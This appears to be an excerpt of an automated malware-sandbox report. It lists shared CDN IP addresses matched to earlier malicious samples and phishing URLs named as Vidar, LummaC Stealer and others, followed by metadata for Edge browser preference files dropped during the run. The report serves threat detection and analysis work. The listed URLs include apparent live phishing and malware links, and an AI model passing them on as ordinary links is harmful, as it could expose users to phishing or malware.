                                                                                                                                                                                                                                                    OPENBASE ATT09918_ 6TH_MARCH_2025 _.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        Map1.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            p-defr00.kxcdn.comhttp://ciso2ciso.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.132
                                                                                                                                                                                                                                                            https://l24.im/RBD8OoVGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            Final Call Smart Manufacturing Excellence Munich (196Mo).msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            http://drawi.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.132
                                                                                                                                                                                                                                                            Document-0191536.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            http://productsthatcount.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            http://idyllic-elf-955535.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            http://t6ceb4773.emailsys2a.net/c/258/8051645/427/0/475433/1/7220/750cd846a5.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            chrome.cloudflare-dns.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                            ADFoyxP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                            ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                            desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                            https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                            ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                            https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                            ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                            q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                            http://pqpqpyj.sbs/av/avr08/index.php?lpkey=174043cdcee2702426549f3edfdcca41a099970167&trkd=omokeh.org&lpkey1=cuuncqujn1oc7393mcc0&language=de&scanid=cuuncqujn1oc7393mcc0&ip=147.161.235.77&t1=133&t2=%7Bt1%7D&t3=%7Bt2%7D&t4=49&t5=174123395189&dm=1&pbid=4598&uid=Tev3Ewws7LqtzrNjCqkamFhqO8Mhj2&t10=4833Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                            a416.dscd.akamai.netfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 2.22.242.105
                                                                                                                                                                                                                                                            LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            • 2.22.242.105
                                                                                                                                                                                                                                                            ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                            • 2.22.242.105
                                                                                                                                                                                                                                                            https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 2.22.242.11
                                                                                                                                                                                                                                                            https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.22.242.11
                                                                                                                                                                                                                                                            q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 95.101.54.115
                                                                                                                                                                                                                                                            09.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                            • 2.22.242.11
                                                                                                                                                                                                                                                            95.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                            • 2.22.242.11
                                                                                                                                                                                                                                                            ESVoO7ywn5.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 2.22.242.105
                                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.22.242.105
                                                                                                                                                                                                                                                            ssl.bingadsedgeextension-prod-europe.azurewebsites.netfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            ESVoO7ywn5.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            Payment_Activity_0079_2025-2-23.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            xn3nGSFdRn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            AKAMAI-ASUShttp://lploverar.bestGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 23.57.28.161
                                                                                                                                                                                                                                                            AaxpYFDQ32.exeGet hashmaliciousAmadey, Credential Flusher, GCleaner, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                            • 104.73.234.102
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 23.57.90.78
                                                                                                                                                                                                                                                            phish_alert_sp2_2.0.0.0 (3).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.16.185.191
                                                                                                                                                                                                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 92.123.12.139
                                                                                                                                                                                                                                                            https://akronhousingorg.sharepoint.com/sites/akronhousing.org/_layouts/15/guestaccess.aspx?e=4%3ayoKuOs&at=9&share=ETxns0_uyAZOqbfnq1g451UBdlSB973uhVLb6tJxyt3tUQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.19.198.72
                                                                                                                                                                                                                                                            gold.rim.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            • 104.73.234.102
                                                                                                                                                                                                                                                            alex111111.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 104.73.234.102
                                                                                                                                                                                                                                                            alex1231231123.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            • 104.73.234.102
                                                                                                                                                                                                                                                            con12312211221.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            • 104.73.234.102
                                                                                                                                                                                                                                                            CLOUDFLARENETUSiJIXzyHnSe.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                            • 172.67.194.22
                                                                                                                                                                                                                                                            O20L0ptxGs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                            • 104.21.32.1
                                                                                                                                                                                                                                                            DayVXJx1km.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                                            0V0Q7kWH0N.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                                                                            NDCNDvC27F.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                            • 104.21.32.1
                                                                                                                                                                                                                                                            https://demanddistribution.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 1.1.1.1
                                                                                                                                                                                                                                                            0IrTeguWM7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                                                                            http://rednosehorse.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 1.1.1.1
                                                                                                                                                                                                                                                            NDCNDvC27F.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                                                                            cexqIzhyvM.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                                                                            AKAMAI-ASN1EU2_DemonstrateExplain.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.22.242.139
                                                                                                                                                                                                                                                            AyciQgru1X.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                            • 2.22.242.82
                                                                                                                                                                                                                                                            http://lploverar.bestGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.16.168.196
                                                                                                                                                                                                                                                            https://aa1selfstorage.com/ioeloro/?wptouch_switch=mobile&redirect=//gamma.app/docs/Untitled-fw6wys6ubo63z1u?mode=present#card-wdvd2twm5f65uwlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.16.100.91
                                                                                                                                                                                                                                                            AaxpYFDQ32.exeGet hashmaliciousAmadey, Credential Flusher, GCleaner, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                            • 23.197.127.21
                                                                                                                                                                                                                                                            https://aa1selfstorage.com/ioeloro/?wptouch_switch=mobile&redirect=//gamma.app/docs/Untitled-fw6wys6ubo63z1u?mode=present#card-wdvd2twm5f65uwlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.16.100.106
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            • 104.117.182.33
                                                                                                                                                                                                                                                            https://aa1selfstorage.com/ioeloro/?wptouch_switch=mobile&redirect=//gamma.app/docs/Untitled-fw6wys6ubo63z1u?mode=present#card-wdvd2twm5f65uwlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 2.16.100.91
                                                                                                                                                                                                                                                            random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            • 23.197.127.21
                                                                                                                                                                                                                                                            https://shared.outlook.inky.com/link?domain=softlinepk.com&t=h.eJx1zEsOgyAUQNGtGMaNICgfR24F5YFE6zOASZume2_pvON7cl_kSjsZG7KWcuaR0oy-7PGAc2sXvFNya8hW-wEFU-iZVkwJ6hJOZYVljYsN6OPjh9kgZsPtPFvOuLVGa-kEU9qA9Z4ZTzvVd0JKIfp2UJLLeod6D_Cdw3QmdDE8fUyQcb9KxCPXc3Wuur_g_QHH7kBM.MEQCIDdyhBdC30Xhm3ePQG2tnTwypWIRFLJPHxaLdIxX14wmAiBphl0LxJNvkKOBoPckbENzIZIrbLOGeJ4IyT9t346tnwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 172.235.181.176
                                                                                                                                                                                                                                                            PROINITYPROINITYDEhttp://ciso2ciso.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            https://l24.im/RBD8OoVGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            Final Call Smart Manufacturing Excellence Munich (196Mo).msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            http://drawi.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.132
                                                                                                                                                                                                                                                            Document-0191536.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                            • 185.172.148.96
                                                                                                                                                                                                                                                            t7f6VkkOBd.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                            • 185.172.148.96
                                                                                                                                                                                                                                                            http://productsthatcount.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                            • 185.172.148.96
                                                                                                                                                                                                                                                            http://idyllic-elf-955535.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 185.172.148.128
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):43097
                                                                                                                                                                                                                                                            Entropy (8bit):6.083879226860133
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:PMkbJ6eg6KzhXRLtkA9Ym9i3zNth25YlD06Ev18FCT9miOfCiobJDSgzMMd6qD4q:PMk16zRRSA9/mieFobtSmd6qE72
                                                                                                                                                                                                                                                            MD5:98A8541A735583ABDF7B5E0BA3415CA1
                                                                                                                                                                                                                                                            SHA1:5618E072C73D76C1C5F05A7CA60C7FDFCDCBE9B0
                                                                                                                                                                                                                                                            SHA-256:C54B5E9016D3179A88F76AD90ECE8D4682F6BAA89891C4EA2F4A2F15E8BDCDAD
                                                                                                                                                                                                                                                            SHA-512:6BCE216CA914B221C4E1FE9A92F4B333D3A78F775927B85F995D51919CDD5A2BB459B7A372683294F2DFC2FBED2C26E4E8DA65E461AADEDF92A87C69FDDC2CA6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385827393485262","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdK
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
                                                                                                                                                                                                                                                            Entropy (8bit):6.090971842355162
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:109FA8C6BA337DA4A3D49E960B3B31D3
                                                                                                                                                                                                                                                            SHA1:C72913D250CCE1604C3947615C0180E326F2BCAB
                                                                                                                                                                                                                                                            SHA-256:E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
                                                                                                                                                                                                                                                            SHA-512:D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):42048
                                                                                                                                                                                                                                                            Entropy (8bit):6.090758496532066
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lDXzgWPsj/qlGJqIY8GB4xWL+i1zNtPe25YlD06Ev18jJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7yOYAtSmd6qE7lFol
                                                                                                                                                                                                                                                            MD5:FC601A715C9D3C16A964ECACB4D566B5
                                                                                                                                                                                                                                                            SHA1:CFCA80AAA48270FC1EFC28CEB8D67B4430A12B09
                                                                                                                                                                                                                                                            SHA-256:359B621C073B7881BE6A74E1A402B9893271E192174B03FAB0F4B6AD4F84304E
                                                                                                                                                                                                                                                            SHA-512:82A43BBCE7C1A98FABD86642E01EF10A45F0703EBC2DC1BBB56A93F7B83E02CD640AE6DC99E53A0B310A1E1714CDB1A03CA13EF008A88A9CB2638A5BFF8A0D81
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):43097
                                                                                                                                                                                                                                                            Entropy (8bit):6.083826120259477
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:PMkbJ6eg6KzhXRLtkAKYm9i1zNth25YlD06Ev18FCT9miOfCiobJDSgzMMd6qD4q:PMk16zRRSAKNmieFobtSmd6qE72
                                                                                                                                                                                                                                                            MD5:B3A4FC207B597230525E9621B2B5F2BF
                                                                                                                                                                                                                                                            SHA1:4F6F016AB7CB315604858DED4939312AE1FBCBF2
                                                                                                                                                                                                                                                            SHA-256:0387615DD987B389DA59BE6CE40C2D24B4371C28620DFA2B737F381F77B87CB9
                                                                                                                                                                                                                                                            SHA-512:1A8FA2C4DD62F89DF5C19AB1029907B107C5ECEA33BEB523C0BAC0C6EA1D47EA9C5BC630E20030D0646F1F30F45D0E6ADB7A483E762FD9D2B96653820C3FDFB7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385827393485262","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdK
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):107893
                                                                                                                                                                                                                                                            Entropy (8bit):4.64013178578393
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7B:fwUQC5VwBIiElEd2K57P7B
                                                                                                                                                                                                                                                            MD5:4534E13AE50BA33B19D3D3C5792108BD
                                                                                                                                                                                                                                                            SHA1:673B117572D45A867B2EDA0B137273EE571B9068
                                                                                                                                                                                                                                                            SHA-256:C1DF2A2CC038B6895860E1F5CE7128393EF389A59075392521C93A05FC2EEC43
